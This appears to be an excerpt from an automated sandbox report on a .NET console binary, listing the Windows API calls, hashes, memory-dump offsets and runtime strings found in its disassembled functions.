                                                                                                                                                                                                                          • Instruction ID: 30d39c3b9ea95427bae8363c615e8403d73e3d394b5a33129ee786ba2577b236
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6783d771dcac7a4889015fb15c6cc57c94424b187cd26dc862f903df37a78b73
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D019275901219AFDB20CF58DD09BAEBBB8EB04725F11026EE811E33D0D7741904CB91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000006,0000002C,?,0141AE3C), ref: 01128848
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 01128855
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000008), ref: 01128868
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000008), ref: 0112887B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$FileSize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3064237074-0
                                                                                                                                                                                                                          • Opcode ID: b84a11a7305490412e832e3d665e1f8b946909588018a9ae2ba7af2ea72891e2
                                                                                                                                                                                                                          • Instruction ID: ec3135ba27c150087a8158f895d307dc5fc4130acda18bc82c67ba4bd1316ca1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b84a11a7305490412e832e3d665e1f8b946909588018a9ae2ba7af2ea72891e2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EEE06D7A6011205ED628277CB90869A6298EB44637F12472DFAB2E12E4EB7088209752
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _swprintf
                                                                                                                                                                                                                          • String ID: {%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
                                                                                                                                                                                                                          • API String ID: 589789837-128308884
                                                                                                                                                                                                                          • Opcode ID: 417d4ae41c4779fcb3647cb4443d8beaacc5dfb6453376037d89d0d4e3c42326
                                                                                                                                                                                                                          • Instruction ID: aa037a7191b7dce7d83338e68a1ab34d88db0d0524795eeb0d4408e76f02d1ca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 417d4ae41c4779fcb3647cb4443d8beaacc5dfb6453376037d89d0d4e3c42326
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0719BB1A40308EBEB20CF98CC59B9EBBB5EF48714F104069EA55BB3D0DBB55905CB51
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0116D5E6
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0116DA2C
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,?,?), ref: 0116DA45
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,?,?), ref: 0116DA5E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: 5b185ba77cb3692e6d0f9ec76afd9022990b9024dfafb8064864d3aacb5281e7
                                                                                                                                                                                                                          • Instruction ID: e812bf9ba52518b7f7e1689e4c857e8eaf524b542b6b50faaf9a9a26d1cdbfd4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b185ba77cb3692e6d0f9ec76afd9022990b9024dfafb8064864d3aacb5281e7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2026DF1E002299BEB60CF58CC80B9EBBB9BB44314F0541D9DA49A7381D7759E94CF98
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 012428F6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • D::HIPCE: finished handling event, xrefs: 012440FF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentThread
                                                                                                                                                                                                                          • String ID: D::HIPCE: finished handling event
                                                                                                                                                                                                                          • API String ID: 2882836952-1184478874
                                                                                                                                                                                                                          • Opcode ID: 8377133b89cb989dc2938fd4922ca4595128f86b07c54325367a049d4209d383
                                                                                                                                                                                                                          • Instruction ID: 69b8559a8c93ea044f24cfcd9b3adc39d2788662dd560bd6ce3c4b44c1d1d776
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8377133b89cb989dc2938fd4922ca4595128f86b07c54325367a049d4209d383
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E412274920286DFEF399FA9E4857AEBBB0BF15304F14416EE9289B283C7B48454CB51
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateErrorInfo.OLEAUT32(?,7CAB6A82,?,?,?), ref: 0121C446
                                                                                                                                                                                                                          • SetErrorInfo.OLEAUT32(00000000,?,?,?,?,?,?), ref: 0121C564
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorInfo$Create
                                                                                                                                                                                                                          • String ID: complib.hlp
                                                                                                                                                                                                                          • API String ID: 3127274525-2623185511
                                                                                                                                                                                                                          • Opcode ID: 65e020f41363513df39e667a6e7dcaed95a88167672fdda1b71b2d1d6b38cb2c
                                                                                                                                                                                                                          • Instruction ID: 8b189989f40549e3333aacd1711895d0c842bc20c751330650525e7f4cc28e13
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65e020f41363513df39e667a6e7dcaed95a88167672fdda1b71b2d1d6b38cb2c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22415B75A00219AFCB04DF98D854B9EBBF9EF48621F25005AE905F73A0DB75AD01CBA1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000002,_CorExeMain,?,00000000,?,?,?,00000000,?,?,0122BD2B,?,00000000,?,00000080), ref: 0122BEA3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _stricmp
                                                                                                                                                                                                                          • String ID: _CorDllMain$_CorExeMain
                                                                                                                                                                                                                          • API String ID: 2884411883-474217011
                                                                                                                                                                                                                          • Opcode ID: bad89608340d224a019530b33b1b598d0cf2c24d5734125895febbc8fba4dabc
                                                                                                                                                                                                                          • Instruction ID: fb34b678519ad9160b2fc7e3ff7dcd75080a0589b64f1977a7dabd20fb44ac3c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bad89608340d224a019530b33b1b598d0cf2c24d5734125895febbc8fba4dabc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E731D93132023A7BDB1A8B1CD890B7EB79FAF50315B9D8429DB059B343DB71E8408794
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 01011287
                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,00000000), ref: 0101129B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CodeExitObjectProcessSingleWait
                                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                                          • API String ID: 1680577353-2746444292
                                                                                                                                                                                                                          • Opcode ID: 303c11425e6852e7277d9d247384debceb8faa34d152359c4dfc8392fe8aa2ec
                                                                                                                                                                                                                          • Instruction ID: 6204fcf8c1b1676b569cdf005868db0663b002639191586683149dc91a5a61ce
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 303c11425e6852e7277d9d247384debceb8faa34d152359c4dfc8392fe8aa2ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB3105B5D00209EFDB10DFA8D945BDEBBF8EB08314F1041AAE914A7290D7795A09CF95
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(7CAB6A82,03C160C0,?,?), ref: 012384E2
                                                                                                                                                                                                                          • RaiseException.KERNEL32(04242420,00000000,00000003,'YA1), ref: 01238545
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebuggerExceptionPresentRaise
                                                                                                                                                                                                                          • String ID: 'YA1
                                                                                                                                                                                                                          • API String ID: 1899633966-3346015194
                                                                                                                                                                                                                          • Opcode ID: 68dfd3de59e4f4c7f927f78cf877c30b967e3321572820a6d59948a03850be9a
                                                                                                                                                                                                                          • Instruction ID: e596e74f7c4522d513b82b2b6ae5fbc5d025facec7a7f830a3529f9e4b6ba8f5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68dfd3de59e4f4c7f927f78cf877c30b967e3321572820a6d59948a03850be9a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 522115B4D01249EFDB10CFA9D955BDEBBB4EB09724F10416EE905AB380D7756A04CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 01215D00: GetProcessHeap.KERNEL32(00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82,00000002), ref: 01215D0C
                                                                                                                                                                                                                            • Part of subcall function 01215D00: RtlAllocateHeap.NTDLL(03BF0000,00000000,?,00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82), ref: 01215D28
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 0122A8C3
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82), ref: 0122A8F7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • D:\a\_work\1\s\src\coreclr\vm\threads.cpp, xrefs: 0122A835
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocateFileFreeModuleNameProcess
                                                                                                                                                                                                                          • String ID: D:\a\_work\1\s\src\coreclr\vm\threads.cpp
                                                                                                                                                                                                                          • API String ID: 1759625101-1819033804
                                                                                                                                                                                                                          • Opcode ID: 405e65fb3075de1825e55777b9ca077c31a4d2517be0e9194fc37534acf24fbf
                                                                                                                                                                                                                          • Instruction ID: 5b1b249b043a94f100e4a5cec24b4d88bfbb3d11518e34c9f3c818398dc7bac5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 405e65fb3075de1825e55777b9ca077c31a4d2517be0e9194fc37534acf24fbf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E12147B090034AEBEB10CFA9D909BEEBBF4FB44718F204619E525A7390D7B91604CB91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000000,?,?), ref: 012D144C
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000000,?,?), ref: 012D1700
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 010869C3
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 01086A1C
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 01086B77
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(0163EF94,?,?,?,?,?,?,?,?,?), ref: 01086BA6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$CloseCriticalHandleLeaveSection
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1789390409-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,7CAB6A82,?,FFFFFFFF), ref: 010A85EC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 39653677-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(7CAB6A82,93F80028,0CB3F4BC,00004000), ref: 0121AE8E
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 0121AEA2
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0121AEAE
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: HeapFree.KERNEL32(00000000,00000000), ref: 0121AED2
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82,00000001,01638748,0000001F), ref: 01136802
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82,00000001,01638748,0000001F), ref: 01136876
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82,00000001,01638748,0000001F), ref: 01136962
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82,00000001,01638748,0000001F), ref: 0113698C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$_errno$wcstoul
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1319467083-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,00000000), ref: 012D8649
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000010,?,00000000), ref: 012D8666
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000004), ref: 012D87C3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocFreeProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2113670309-0
                                                                                                                                                                                                                          • Opcode ID: 7025d51a039d960e3c6b6259a3a9994b17ac671c4a0676a15e4feb0ba1cf73c7
                                                                                                                                                                                                                          • Instruction ID: 3837777eb43b4cac7a9b9a6e0c8aaaae7c786e7a02c4cd030aaef16f0dfe6a5f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7025d51a039d960e3c6b6259a3a9994b17ac671c4a0676a15e4feb0ba1cf73c7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF51F4B4B102199FEB24DF28CC40BAA77A4EF54310F0180BDEB49EB351DB709995CB94
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,00000000,012D48E2,00000000), ref: 012D04A7
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000038,00000000,?,00000000,012D48E2,00000000), ref: 012D04C4
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C), ref: 012D0504
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D0606
                                                                                                                                                                                                                            • Part of subcall function 012CC070: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C,012D5387,00000000,00000000,00000000,?,?,?,?,?,?,?,?,012D488E), ref: 012CC072
                                                                                                                                                                                                                            • Part of subcall function 012CC440: GetProcessHeap.KERNEL32(7CAB6A82,00000000,?,?,?,?,?,?,?,?,?,014F3C95,000000FF,?,012D4EF6,00000000), ref: 012CC478
                                                                                                                                                                                                                            • Part of subcall function 012CC440: HeapAlloc.KERNEL32(03BF0000,00000000,00000008,7CAB6A82,00000000,?,?,?,?,?,?,?,?,?,014F3C95,000000FF), ref: 012CC495
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocProcessmalloc$free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3221293056-0
                                                                                                                                                                                                                          • Opcode ID: 65e5637f6f8be35c611fc06c4a0b0e1193d37ffa614b25bd9c77dcf7da530fa8
                                                                                                                                                                                                                          • Instruction ID: 4edc830c612ab4489db2606a78299c9f7529c3d3eaf1ab95ce69da085dee5765
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65e5637f6f8be35c611fc06c4a0b0e1193d37ffa614b25bd9c77dcf7da530fa8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2051B2717107028FE731DF6DD840716BBE0EF94715F20462DEA598B7A0EB71A814CB95
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,012D7542), ref: 012DB35C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: 669e2ae45b58e6b7f33c2a7f48b649057ea53d1956a63a8d73058686854c8e56
                                                                                                                                                                                                                          • Instruction ID: 9ce14b9c79ea202a8fbeafd9787c721426d13c3e4bd412ee32798da78e0ffb95
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 669e2ae45b58e6b7f33c2a7f48b649057ea53d1956a63a8d73058686854c8e56
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70414571E20606ABEB61CF6DCC547AEBBE4AF56700F02812DEA45D7350EB709854C7D0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(0159D260,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,012D488E), ref: 012D53B8
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,012D488E), ref: 012D5485
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,012D488E), ref: 012D5495
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$strcmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 507678545-0
                                                                                                                                                                                                                          • Opcode ID: 26017806f4e9855cd1bcaef1984819433de4b3af2988bcfa487be96932a9568d
                                                                                                                                                                                                                          • Instruction ID: 13437103097fab84567fd91c708093ed01b684ed911a2d9ce24047853ed41bf8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26017806f4e9855cd1bcaef1984819433de4b3af2988bcfa487be96932a9568d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB41D371B207129BDB219F29DC00A2AF7F5FF84712F08462DEE5997250EBB1D8148B92
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018,?,00000000,?,012DA7F8,?,00000000,?,?,?,?,?,012DACC7), ref: 012D6025
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012D6073
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012D6082
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012D608C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$malloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2190258309-0
                                                                                                                                                                                                                          • Opcode ID: 7625221f1c9f0806141df1645f9f9a2b8b666322605e8b8d18475ff20cd9b805
                                                                                                                                                                                                                          • Instruction ID: 9866cda29e5526b26932079dc9b656ac7943326ef8d00303a0e36ae65f81a039
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7625221f1c9f0806141df1645f9f9a2b8b666322605e8b8d18475ff20cd9b805
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C0124B17002125BEA049B68E80866B7771FFC1227F24453DF606D3360EB26A46187E2